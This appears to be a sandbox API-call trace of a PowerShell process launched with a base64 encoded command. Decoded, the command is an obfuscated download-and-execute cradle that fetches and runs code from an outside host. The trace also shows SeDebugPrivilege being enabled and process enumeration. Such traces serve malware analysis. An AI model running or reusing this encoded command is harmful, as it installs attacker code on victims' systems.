	[0981.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0981.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0982.090] SetConsoleCtrlHandler (HandlerRoutine=0x29468dc, Add=1) returned 1
	[0982.310] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304
	[0982.312] CoCreateGuid (in: pguid=0x1ada50 | out: pguid=0x1ada50*(Data1=0x8d1dfe63, Data2=0xcc14, Data3=0x4476, Data4=([0]=0xbd, [1]=0x2b, [2]=0xf4, [3]=0x3e, [4]=0x98, [5]=0xd7, [6]=0xe, [7]=0x5))) returned 0x0
	[0982.314] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0982.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.314] CoTaskMemFree (pv=0x359ae0) 
	[0982.338] WinSqmIsOptedIn () returned 0x0
	[0982.339] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0982.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.339] CoTaskMemFree (pv=0x359ae0) 
	[0982.339] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0982.339] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.340] CoTaskMemFree (pv=0x359ae0) 
	[0982.340] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0982.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.340] CoTaskMemFree (pv=0x359ae0) 
	[0982.341] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0982.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.341] CoTaskMemFree (pv=0x359ae0) 
	[0982.341] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0982.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.341] CoTaskMemFree (pv=0x359ae0) 
	[0982.342] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0982.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.343] CoTaskMemFree (pv=0x359ae0) 
	[0982.343] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0982.343] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.343] CoTaskMemFree (pv=0x359ae0) 
	[0982.344] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0982.344] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.344] CoTaskMemFree (pv=0x359ae0) 
	[0982.347] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0982.347] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.347] CoTaskMemFree (pv=0x359ae0) 
	[0982.700] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0982.700] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.700] CoTaskMemFree (pv=0x359ae0) 
	[0982.704] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0982.704] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.704] CoTaskMemFree (pv=0x359ae0) 
	[0982.705] CoTaskMemAlloc (cb=0x104) returned 0x359ae0
	[0982.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x359ae0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0982.705] CoTaskMemFree (pv=0x359ae0) 

Thread:
	id = 1100
	os_tid = 0x1600


Thread:
	id = 1113
	os_tid = 0x170c


Thread:
	id = 1474
	os_tid = 0x1d38


Thread:
	id = 1479
	os_tid = 0x1e48


Thread:
	id = 1529
	os_tid = 0x2008


Thread:
	id = 1622
	os_tid = 0x220c


Thread:
	id = 1645
	os_tid = 0x2278

	[0829.963] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 1670
	os_tid = 0x2308


Process:
	id = "179"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x35b5d000"
	os_pid = "0x1ac8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1010
	os_tid = 0x1acc

	[0552.032] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x68
	[0947.586] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0953.843] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0953.843] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0953.843] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0953.843] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0958.162] GetVersionExW (in: lpVersionInformation=0x26d900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d900*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0958.164] GetVersionExW (in: lpVersionInformation=0x26d900*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d900*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0958.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0958.177] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0958.178] GetVersionExW (in: lpVersionInformation=0x26d670*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26d670*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0958.178] SetErrorMode (uMode=0x1) returned 0x1
	[0958.179] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26d7d0 | out: lpFileInformation=0x26d7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0958.180] SetErrorMode (uMode=0x1) returned 0x1
	[0958.184] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26da40 | out: lpdwHandle=0x26da40) returned 0x94c
	[0958.843] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2dc72d8 | out: lpData=0x2dc72d8) returned 1
	[0958.846] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26d9b8, puLen=0x26d9b0 | out: lplpBuffer=0x26d9b8*=0x2dc7374, puLen=0x26d9b0) returned 1
	[0958.849] lstrlenW (lpString="䅁") returned 1
	[0958.859] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26d928, puLen=0x26d920 | out: lplpBuffer=0x26d928*=0x2dc7450, puLen=0x26d920) returned 1
	[0958.860] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0958.862] CoTaskMemAlloc (cb=0x2e) returned 0x52de90
	[0958.862] lstrcpyW (in: lpString1=0x52de90, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0958.863] CoTaskMemFree (pv=0x52de90) 
	[0958.863] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26d928, puLen=0x26d920 | out: lplpBuffer=0x26d928*=0x2dc74a4, puLen=0x26d920) returned 1
	[0958.863] lstrlenW (lpString="System.Management.Automation") returned 28
	[0958.863] CoTaskMemAlloc (cb=0x3c) returned 0x449b30
	[0958.863] lstrcpyW (in: lpString1=0x449b30, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0958.863] CoTaskMemFree (pv=0x449b30) 
	[0958.863] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26d928, puLen=0x26d920 | out: lplpBuffer=0x26d928*=0x2dc7500, puLen=0x26d920) returned 1
	[0958.863] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0958.863] CoTaskMemAlloc (cb=0x20) returned 0x52eff0
	[0958.863] lstrcpyW (in: lpString1=0x52eff0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0958.863] CoTaskMemFree (pv=0x52eff0) 
	[0958.863] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26d928, puLen=0x26d920 | out: lplpBuffer=0x26d928*=0x2dc7540, puLen=0x26d920) returned 1
	[0958.863] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0958.863] CoTaskMemAlloc (cb=0x44) returned 0x449b30
	[0958.863] lstrcpyW (in: lpString1=0x449b30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0958.863] CoTaskMemFree (pv=0x449b30) 
	[0958.863] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26d928, puLen=0x26d920 | out: lplpBuffer=0x26d928*=0x2dc75a8, puLen=0x26d920) returned 1
	[0958.863] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0958.864] CoTaskMemAlloc (cb=0x76) returned 0x4b3890
	[0958.864] lstrcpyW (in: lpString1=0x4b3890, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0958.864] CoTaskMemFree (pv=0x4b3890) 
	[0958.864] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26d928, puLen=0x26d920 | out: lplpBuffer=0x26d928*=0x2dc7644, puLen=0x26d920) returned 1
	[0958.864] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0958.864] CoTaskMemAlloc (cb=0x44) returned 0x449b30
	[0958.864] lstrcpyW (in: lpString1=0x449b30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0958.864] CoTaskMemFree (pv=0x449b30) 
	[0958.864] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26d928, puLen=0x26d920 | out: lplpBuffer=0x26d928*=0x2dc76a8, puLen=0x26d920) returned 1
	[0958.864] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0958.864] CoTaskMemAlloc (cb=0x58) returned 0x4651f0
	[0958.864] lstrcpyW (in: lpString1=0x4651f0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0958.864] CoTaskMemFree (pv=0x4651f0) 
	[0958.864] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26d928, puLen=0x26d920 | out: lplpBuffer=0x26d928*=0x2dc7724, puLen=0x26d920) returned 1
	[0958.864] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0958.864] CoTaskMemAlloc (cb=0x20) returned 0x52eff0
	[0958.864] lstrcpyW (in: lpString1=0x52eff0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0958.864] CoTaskMemFree (pv=0x52eff0) 
	[0958.864] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26d928, puLen=0x26d920 | out: lplpBuffer=0x26d928*=0x2dc73cc, puLen=0x26d920) returned 1
	[0958.864] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0958.864] CoTaskMemAlloc (cb=0x66) returned 0x48f580
	[0958.864] lstrcpyW (in: lpString1=0x48f580, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0958.864] CoTaskMemFree (pv=0x48f580) 
	[0958.864] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26d928, puLen=0x26d920 | out: lplpBuffer=0x26d928*=0x0, puLen=0x26d920) returned 0
	[0958.864] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26d928, puLen=0x26d920 | out: lplpBuffer=0x26d928*=0x0, puLen=0x26d920) returned 0
	[0958.864] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26d928, puLen=0x26d920 | out: lplpBuffer=0x26d928*=0x0, puLen=0x26d920) returned 0
	[0958.864] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26d8f8, puLen=0x26d8f0 | out: lplpBuffer=0x26d8f8*=0x2dc7374, puLen=0x26d8f0) returned 1
	[0958.866] CoTaskMemAlloc (cb=0x204) returned 0x462f90
	[0958.866] VerLanguageNameW (in: wLang=0x0, szLang=0x462f90, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0958.867] CoTaskMemFree (pv=0x462f90) 
	[0958.867] VerQueryValueW (in: pBlock=0x2dc72d8, lpSubBlock="\\", lplpBuffer=0x26d948, puLen=0x26d940 | out: lplpBuffer=0x26d948*=0x2dc7300, puLen=0x26d940) returned 1
	[0958.873] GetCurrentProcessId () returned 0x1ac8
	[0958.890] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x26c870 | out: lpLuid=0x26c870*(LowPart=0x14, HighPart=0)) returned 1
	[0959.413] GetCurrentProcess () returned 0xffffffffffffffff
	[0959.414] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x26c890 | out: TokenHandle=0x26c890*=0x2d4) returned 1
	[0959.415] AdjustTokenPrivileges (in: TokenHandle=0x2d4, DisableAllPrivileges=0, NewState=0x2dcab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0959.416] CloseHandle (hObject=0x2d4) returned 1
	[0959.420] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac8) returned 0x2d4
	[0959.429] EnumProcessModules (in: hProcess=0x2d4, lphModule=0x2dcabb8, cb=0x200, lpcbNeeded=0x26d8a8 | out: lphModule=0x2dcabb8, lpcbNeeded=0x26d8a8) returned 1
	[0959.432] GetModuleInformation (in: hProcess=0x2d4, hModule=0x13f370000, lpmodinfo=0x2dcae28, cb=0x18 | out: lpmodinfo=0x2dcae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0959.433] CoTaskMemAlloc (cb=0x804) returned 0x1b8d0680
	[0959.433] GetModuleBaseNameW (in: hProcess=0x2d4, hModule=0x13f370000, lpBaseName=0x1b8d0680, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0959.433] CoTaskMemFree (pv=0x1b8d0680) 
	[0959.434] CoTaskMemAlloc (cb=0x804) returned 0x1b8d0680
	[0959.434] GetModuleFileNameExW (in: hProcess=0x2d4, hModule=0x13f370000, lpFilename=0x1b8d0680, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0959.434] CoTaskMemFree (pv=0x1b8d0680) 
	[0959.435] CloseHandle (hObject=0x2d4) returned 1
	[0959.443] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x1ac8) returned 0x2d4
	[0959.444] GetExitCodeProcess (in: hProcess=0x2d4, lpExitCode=0x26d9d8 | out: lpExitCode=0x26d9d8*=0x103) returned 1
	[0960.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12dcb088, Length=0x20000, ResultLength=0x26d9a0 | out: SystemInformation=0x12dcb088, ResultLength=0x26d9a0*=0x4a3c0) returned 0xc0000004
	[0960.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12deb0b8, Length=0x4cbc0, ResultLength=0x26d9a0 | out: SystemInformation=0x12deb0b8, ResultLength=0x26d9a0*=0x4a3c0) returned 0x0
	[0960.172] EnumWindows (lpEnumFunc=0x28e66ac, lParam=0x0) 
	[0961.916] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.916] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x558
	[0961.916] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.916] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.916] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.916] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x538
	[0961.916] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.916] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x778
	[0961.916] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x778
	[0961.916] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.916] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.916] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.917] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
	[0961.917] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x26d700 | out: lpdwProcessId=0x26d700) returned 0x4d0
